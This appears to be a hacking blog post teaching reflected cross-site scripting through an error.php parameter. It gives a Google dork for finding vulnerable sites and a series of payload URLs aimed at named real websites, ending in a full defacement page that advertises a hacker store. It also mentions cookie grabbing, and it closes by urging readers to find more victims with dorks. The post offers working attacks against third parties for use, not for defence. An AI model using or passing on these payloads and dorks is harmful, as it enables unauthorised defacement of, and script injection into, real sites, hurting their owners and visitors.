error.php XSS (Cross Site Scripting) Vulnerabilities
Title : error.php XSS
Risk : Cross site scripting, cookie Grabbing
Poc : error.php?error=
Dork : "inurl:error.php?error="
Author : Minhal Mehdi (devilscafe.in)
browser : Mozilla Firefox
error.php XSS (Cross Site Scripting) Vulnerabilities
1). Go to Google and now type the dork "inurl:error.php?error="
in search results ignore all the extra results with different URL Like : error-php-error.php
pick site with url www.site.com/error.php?error= Only..
2). Now Type your first Tag to Check the vulnerability
example : www.site.com/error.php?error=<h1>Test</h1>
if it will show you "Test" word in Header tag this Its Vulnerable
Here are few ways in you you can inject your xss vector :) ..
How To show Header XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<h1>Hacked</h1>
To show header in center XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<center><h1>Hacked</h1></center>
How to show Title XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title>
How to Add a Image XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbRsPwyz0WHjVvS9m-EE7xmkasRkwpLH-R-e_wavQ9gNje9ClsH6xNSckw1eGE9U2NGciJG9HzFia4upikWlxx2fD35fLI3chd1XMUe6xaeX_i55frSH-BKQ3tJCw_5f6UE7OHLTPUNiyR/s640/cats.jpg"/>
How to add a Message XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<p><b>Your Message Here<b></p>
How to write message in next lines XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<p><b>First line<br>Second Line <b></p>
How To add a scrolling Text XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<marquee>Scrolling text Here</marquee>
How To Add a alert box XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<script>alert("hello");</script>
How To add background colour in page XSS injection:
http://www.sacareerfocus.co.za/error.php?error=<body bgcolor="red"/>
How to Add a full deface Page
http://www.sacareerfocus.co.za/error.php?error=<title>Hacked</title><center><h1>hacked<h1><body bgcolor="red"/><p><b>You have been Hacked<br></b></p><img src="http://t0.gstatic.com/images?q=tbn:ANd9GcTN4uz2ifRTDefV_N7O2ZLEnyNfWb5TooIwqmZSwxOe_XH-8FksHA"/>
<marquee><b>www.thehackerstore.net</b></marquee>
you can add more html and javscript tags here,
here is another demo site :
here is another demo site :
www.carrubbers.org/error.php?error=<center><h1>www.thehackerstore.net</h1></center>
find More website with dorks :)
find More website with dorks :)
if you have any queries feel free to comment below :)
0 komentar